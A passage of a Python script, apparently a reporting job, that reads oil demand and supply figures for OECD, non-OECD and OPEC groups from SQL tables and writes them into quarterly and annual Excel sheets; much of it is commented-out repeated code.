# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# # #print("total non oecds")
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and Regionname IS NULL and ReportedDate like '2019-02-13%'",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# else:
# row_ex = 'A' + str(non)
# region = sheet[row_ex].value
# cursor.execute(
# "SELECT Value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and RegionName = %s and ReportedDate like '2019-02-13%'",
# (period, region,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# currentCell = sheet.cell(row=non, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=1,
# vertical='bottom',
# wrap_text=True)
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# currentCell = sheet.cell(row=non, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=1,
# vertical='bottom',
# wrap_text=True)
# if sheet[row_ex].value == 'Total Demand':
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups IS NULL and Period = %s and Regionname IS NULL and ReportedDate like '2019-02-13%'",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# break
# #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-4Q'):
# break
# totaloecd_supply = int(fetch.get('totaloecd_supply')) +1
# oecd_supply = int(fetch.get('oecd_supply'))
# for row in range(oecd_supply, totaloecd_supply):
# row_ex = 'A' + str(row)
# if sheet[row_ex].value == 'Total OECD':
# # print("total supply oecds")
# currentCell = sheet.cell(row=row, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Period = %s and Regionname IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=row, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=row, column=col).value = val
#
# break
# else:
# row_ex = 'A' + str(row)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=row, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Regionname = %s and Period = %s ",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell = sheet.cell(row=row, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Period = %s and Country = %s ",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=row, column=col).value = val
#
# else:
# country = sheet[row_ex].value ##for uk
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom', wrap_text=True)
# cursor.execute(
# "SELECT Value FROM Report3 WHERE ElementType = 'Supply' and Period = %s and Country = %s",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=row, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=row, column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# print(val, period,country)
# # #
for col in range(2, max_col):
period = sheet.cell(row=1, column=col).value
print(period)
if (period == '2025-1Q'):
break
else:# for supply non-oecd
totalnonoecd_supply = int(fetch.get('totalnonoecd_supply')) + 1
nonoecd_supply = int(fetch.get('nonoecd_supply'))
for non in range(nonoecd_supply, totalnonoecd_supply):
row_ex = 'A' + str(non)
if sheet[row_ex].value == 'Total Non-OECD':
currentCell = sheet.cell(row=non, column=1)
# print(row)
currentCell.alignment = Alignment(horizontal='left', indent=0,
vertical='bottom',
wrap_text=True)
cursor.execute(
"SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Regionname IS NULL",
(period,))
result = cursor.fetchone()
if result is None:
val = ''
sheet.cell(row=non, column=col).value = val
else:
for val in result:
sheet.cell(row=non, column=col).value = val
break
else:
row_ex = 'A' + str(non)
region = sheet[row_ex].value
currentCell = sheet.cell(row=non, column=1)
cursor.execute(
"SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Regionname = %s and Period = %s",
(region,period,))
result = cursor.fetchone()
if result is None:
country = sheet[row_ex].value
currentCell.alignment = Alignment(horizontal='left', indent=2,vertical='bottom',wrap_text=True)
cursor.execute(
"SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Country = %s",
(period,country))
result = cursor.fetchall()
print(result)
if result and len(result) > 0:
val = result[0][0]
sheet.cell(row=non, column=col).value = val
else:
pass
else:
for val in result:
sheet.cell(row=non,column=col).value = val
currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-4Q'):
# break
# # for supply nonopec
# total_non_opec_supply = int(fetch.get('total_non_opec_supply')) + 2
# print(total_non_opec_supply)
# totalnonoecd_supply = int(fetch.get('totalnonoecd_supply'))
# print(totalnonoecd_supply)
# for nonopec in range(totalnonoecd_supply, total_non_opec_supply):
# row_ex = 'A' + str(nonopec) #
# if (period == '2025-4Q'):
# flag = 1
# progain = sheet[row_ex].value
# if sheet[row_ex].value == 'Processing gains':
# print("Processing gainsProcessing gains")
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (progain,period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
#
# else:
# for val in result:
# print(val)
# sheet.cell(row=nonopec, column=col).value = val
#
#
# elif sheet[row_ex].value == 'Global Biofuels':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# gobal_f=sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (gobal_f, period,))
# result = cursor.fetchone()
# #print(result)
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# elif sheet[row_ex].value == 'Total Non-OPEC Supply':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC' and Period = %s and ReportedDate like '2019-02-13%'",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# elif sheet[row_ex].value == 'Non-OPEC: Historical Composition':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM IEA_HistoricMacroElementsData WHERE ElementType = 'S' and TableType = '1' and GroupID1 = '4' and GroupID2 = '7' and PeriodID = %s and ReportedDate like '2019-02-13%'",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# # # # #
# # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-4Q'):
# break# #
# # # # # #for opec supply
# total_opec_supply=int(fetch.get('total_opec_supply'))+10
# opec_supply = int(fetch.get('opec_supply'))
# for opec in range(opec_supply, total_opec_supply):
# row_ex = 'A' + str(opec)
# if (period == '2025-4Q'):
# break
# crude = sheet[row_ex].value
# if crude == 'Crude':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s ",
# (crude, period,))
# result = cursor.fetchone()
# #print(result)
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'NGL':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# ngl = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s ",
# (ngl, period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'Total OPEC':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'OPEC' and Regionname IS NULL and Period = %s ",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'OPEC: Historical Composition':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM IEA_HistoricMacroElementsData WHERE ElementType = 'S' and TableType = '1' and GroupID1 = '3' and GroupID2 = '7' and PeriodID = %s ",
# ( period,))
# result = cursor.fetchone()
# print("historical OPEC",result)
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'Total Supply':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups IS NULL and Period = %s ",
# (period,))
# result = cursor.fetchone()
#
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# else:
# row_ex = 'A' + str(opec)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=opec, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'OPEC' and Regionname = %s and Period = %s",
# (region,period, ))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell.alignment = Alignment(horizontal='left', indent=2, vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'OPEC' and Period = %s and Country = %s ",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=opec, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
except Error as e:
print("print", e)
# # # # #
## To insert Annual data fron tables
def annual_data():
# try:
# sheet = wb.get_sheet_by_name('Annual_Previous')
# wb.remove_sheet(sheet)
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Annual_Previous'
# wb.remove_sheet(sheet)
# except Exception as e:
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Annual_Previous'
# wb.remove_sheet(sheet)
# region = regions('Annual')
fetch = fetch_excel("Annual_Previous")
sheet = wb.get_sheet_by_name('Annual_Previous')
max_col = (sheet.max_column)
print(max_col)
fetch = fetch[0]
print(fetch)#
# # # print(max_row)
try:
# # sheet['A12'].alignment = Alignment(horizontal="left")
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# totaloecd_demand = int(fetch.get('totaloecd_demand')) + 1
# oecd_demand = int(fetch.get('oecd_demand'))
# for row in range(oecd_demand, totaloecd_demand):
# row_ex = 'A' + str(row)
# if (period == '2025-Y'):
# flag = 1
# break
# else:
# if sheet[row_ex].value == 'Total OECD':
# # print("total oecds")
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and RegionName IS NULL and ReportedDate <= '2019-01-18 00:00:00'",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=row, column=col).value = val
# else:
# if ('Y' in period):
# for val in result:
# sheet.cell(row=row, column=col).value = val
# else:
# region = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and Regionname = %s and ReportedDate <= '2019-01-18 00:00:00'",
# (period, region,))
# result = cursor.fetchall()
# if result and len(result) >0:
# val = result[0][0]
# print(val)
# if ('Y' in period):
# sheet.cell(row=row, column=col).value = val
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=1, vertical='bottom',
# wrap_text=True)
#
# else:
# country = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM ReportFor2b WHERE ElementType = 'Demand' and Groups = 'OECD' and Period = %s and Country = %s and ReportedDate <= '2019-01-18 00:00:00'",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# if ('Y' in period):
# sheet.cell(row=row, column=col).value = val
# currentCell = sheet.cell(row=row, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
#
# else:
# pass
# # # # # #
# # # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# # #for demand and nonoecd #
# totalnonoecd_demand = int(fetch.get('totalnonoecd_demand')) + 2
# #for total demand
# nonoecd_demand = int(fetch.get('nonoecd_demand'))
# for non in range(nonoecd_demand, totalnonoecd_demand):
# row_ex = 'A' + str(non)
# if sheet[row_ex].value == 'Total Non-OECD':
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# # #print("total non oecds")
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and RegionName IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# else:
# row_ex = 'A' + str(non)
# region = sheet[row_ex].value
# cursor.execute(
# "SELECT Value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and RegionName = %s ",
# (period, region,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM ReportFor2b WHERE ElementType = 'Demand' and Groups = 'Non-OECD' and Period = %s and Country = %s",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# if ('Y' in period):
# sheet.cell(row=non, column=col).value = val
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# currentCell = sheet.cell(row=non, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=1,
# vertical='bottom',
# wrap_text=True)
# if sheet[row_ex].value == 'Total Demand':
# currentCell = sheet.cell(row=non, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Demand' and Groups IS NULL and Period = %s and RegionName IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# break
# # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# totaloecd_supply = int(fetch.get('totaloecd_supply')) +1
# oecd_supply = int(fetch.get('oecd_supply'))
# for row in range(oecd_supply, totaloecd_supply):
# row_ex = 'A' + str(row)
# if sheet[row_ex].value == 'Total OECD':
# # print("total supply oecds")
# currentCell = sheet.cell(row=row, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Period = %s and RegionName IS NULL ",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=row, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=row, column=col).value = val
#
# break
# else:
# row_ex = 'A' + str(row)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=row, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Regionname = %s and Period = %s ",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell = sheet.cell(row=row, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-OECD' and Period = %s and Country = %s ",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=row, column=col).value = val
#
# else:
# country = sheet[row_ex].value ##for uk
# currentCell.alignment = Alignment(horizontal='left', indent=2,
# vertical='bottom', wrap_text=True)
# cursor.execute(
# "SELECT Value FROM Report3 WHERE ElementType = 'Supply' and Period = %s and Country = %s ",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=row, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=row, column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# print(val, period)
# # # # # # # #
for col in range(2, max_col):
period = sheet.cell(row=1, column=col).value
print(period)
if (period == '2025-Y'):
break # for supply non-oecd
totalnonoecd_supply = int(fetch.get('totalnonoecd_supply')) + 1
nonoecd_supply = int(fetch.get('nonoecd_supply'))
for non in range(nonoecd_supply, totalnonoecd_supply):
row_ex = 'A' + str(non)
if sheet[row_ex].value == 'Total Non-OECD':
currentCell = sheet.cell(row=non, column=1)
# print(row)
currentCell.alignment = Alignment(horizontal='left', indent=0,
vertical='bottom',
wrap_text=True)
cursor.execute(
"SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and RegionName IS NULL ",
(period,))
result = cursor.fetchone()
if result is None:
val = ''
sheet.cell(row=non, column=col).value = val
else:
for val in result:
sheet.cell(row=non, column=col).value = val
break
else:
row_ex = 'A' + str(non)
region = sheet[row_ex].value
currentCell = sheet.cell(row=non, column=1)
cursor.execute(
"SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Regionname = %s and Period = %s ",
(region,period,))
result = cursor.fetchone()
if result is None:
country = sheet[row_ex].value
currentCell.alignment = Alignment(horizontal='left', indent=2,vertical='bottom',wrap_text=True)
cursor.execute(
"SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Country = %s ",
(period, country,))
result = cursor.fetchall()
if result and len(result) > 0:
val = result[0][0]
sheet.cell(row=non, column=col).value = val
else:
pass
else:
for val in result:
sheet.cell(row=non,column=col).value = val
currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# # # # # # # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# # for supply nonopec
# total_non_opec_supply = int(fetch.get('total_non_opec_supply'))
# totalnonoecd_supply = int(fetch.get('totalnonoecd_supply')) + 1
# nonoecd_supply = int(fetch.get('nonoecd_supply'))
# for non in range(nonoecd_supply, totalnonoecd_supply):
# row_ex = 'A' + str(non)
# if sheet[row_ex].value == 'Total Non-OECD':
# currentCell = sheet.cell(row=non, column=1)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and RegionName IS NULL and ReportedDate like '2019-02-13%'",
# (period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=non, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=non, column=col).value = val
# break
# else:
# row_ex = 'A' + str(non)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=non, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Regionname = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell.alignment = Alignment(horizontal='left', indent=2,vertical='bottom',wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'Non-OPEC-Non-OECD' and Period = %s and Country = %s and ReportedDate like '2019-02-13%'",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=non, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# print(val)
# sheet.cell(row=non,column=col).value = val
# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
# print(total_non_opec_supply)
# totalnonoecd_supply = int(fetch.get('totalnonoecd_supply'))
# print(totalnonoecd_supply)
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break
# for nonopec in range(totalnonoecd_supply, total_non_opec_supply):
# row_ex = 'A' + str(nonopec) #
# if (period == '2025-Y'):
# break
# progain = sheet[row_ex].value
# print(progain)
# if sheet[row_ex].value == 'Processing gains':
# print("Processing gainsProcessing gains")
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (progain,period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
#
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
#
# elif sheet[row_ex].value == 'Global Biofuels':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# gobal_f=sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s and ReportedDate like '2019-02-13%'",
# (gobal_f, period,))
# result = cursor.fetchone()
# #print(result)
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# elif sheet[row_ex].value == 'Total Non-OPEC Supply':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'Non-OPEC' and Period = %s and ReportedDate like '2019-02-13%'",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# elif sheet[row_ex].value == 'Non-OPEC: Historical Composition':
# currentCell = sheet.cell(row=nonopec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM IEA_HistoricMacroElementsData WHERE ElementType = 'S' and TableType = '1' and GroupID1 = '4' and GroupID2 = '7' and PeriodID = %s and ReportedDate like '2019-02-13%'",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=nonopec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=nonopec, column=col).value = val
# # # #
# # # # # #
# for col in range(2, max_col):
# period = sheet.cell(row=1, column=col).value
# print(period)
# if (period == '2025-Y'):
# break# #
# # # # # #for opec supply
# total_opec_supply=int(fetch.get('total_opec_supply'))+10
# opec_supply = int(fetch.get('opec_supply'))
# for opec in range(opec_supply, total_opec_supply):
# row_ex = 'A' + str(opec)
# if (period == '2025-Y'):
# break
# crude = sheet[row_ex].value
# if crude == 'Crude':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s ",
# (crude, period,))
# result = cursor.fetchone()
# #print(result)
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'NGL':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# ngl = sheet[row_ex].value
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = %s and Period = %s ",
# (ngl, period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'Total OPEC':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'OPEC' and RegionName IS NULL and Period = %s",
# ( period,))
# result = cursor.fetchone()
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'OPEC: Historical Composition':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM IEA_HistoricMacroElementsData WHERE ElementType = 'S' and TableType = '1' and GroupID1 = '3' and GroupID2 = '7' and PeriodID = %s",
# ( period,))
# result = cursor.fetchone()
# print("historical OPEC",result)
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# elif sheet[row_ex].value == 'Total Supply':
# currentCell = sheet.cell(row=opec, column=1)
# # print(row)
# currentCell.alignment = Alignment(horizontal='left', indent=0,
# vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups IS NULL and Period = %s",
# (period,))
# result = cursor.fetchone()
#
# if result is None:
# val = ''
# sheet.cell(row=opec, column=col).value = val
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
# else:
# row_ex = 'A' + str(opec)
# region = sheet[row_ex].value
# currentCell = sheet.cell(row=opec, column=1)
# cursor.execute(
# "SELECT value FROM TotalSummaryReport WHERE ElementType = 'Supply' and Groups = 'OPEC' and Regionname = %s and Period = %s",
# (region,period,))
# result = cursor.fetchone()
# if result is None:
# country = sheet[row_ex].value
# currentCell.alignment = Alignment(horizontal='left', indent=2, vertical='bottom',
# wrap_text=True)
# cursor.execute(
# "SELECT Value FROM ReportFor3 WHERE ElementType = 'Supply' and Groups = 'OPEC' and Period = %s and Country = %s",
# (period, country,))
# result = cursor.fetchall()
# if result and len(result) > 0:
# val = result[0][0]
# sheet.cell(row=opec, column=col).value = val
#
# else:
# pass
# else:
# for val in result:
# sheet.cell(row=opec, column=col).value = val
